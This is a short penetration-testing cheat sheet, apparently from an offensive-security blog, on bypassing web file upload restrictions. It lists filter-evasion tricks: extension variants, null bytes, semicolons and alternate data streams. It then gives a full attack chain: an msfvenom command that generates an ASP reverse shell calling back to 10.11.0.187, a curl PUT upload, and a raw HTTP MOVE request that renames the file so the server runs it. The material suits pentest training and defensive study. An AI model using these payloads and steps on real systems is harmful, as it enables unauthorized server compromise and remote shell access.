Bypassing File Upload Restrictions

Common techniques to bypass File upload restrictions on web sites.

Change the Content-Type parameter in the request header using Burp, ZAP etc.
Put server executable extensions like file.php5, file.shtml, file.asa, file.cert
Changing letters to capital form file.aSp or file.PHp3
Using trailing spaces and/or dots at the end of the filename like file.asp… … . . .. .. , file.asp , file.asp.
Use of semicolon after the forbidden extension and before the permitted extension example: file.asp;.jpg (Only in IIS 6 or prior)
Upload a file with 2 extensions—> file.php.jpg
Use of null character e.g file.asp%00.jpg
Create a file with a forbidden extension e.g. file.asp:.jpg or file.asp::$data

When Both MOVE and PUT HTTP Methods is available

Create payload and rename to .txt:

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.187 LPORT=443 -f asp &gt; shell443.asp

1 2	msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.187 LPORT=443 -f asp > shell443.asp

Upload file via Curl and PUT Method:

curl -T shell443.txt http://10.11.1.229/ -v

1 2	curl -T shell443.txt http://10.11.1.229/ -v

From ZAP or Burp rename/move the file to shell443.asp;.jpg where jpg is allowed:

MOVE http://10.11.1.229/shell443.txt HTTP/1.1
Accept: */ *
Destination: /shell443.asp;.jpg
Overwrite: F
Content-Length: 0
Host: 10.11.1.229

Tags: curl

OffSec Blog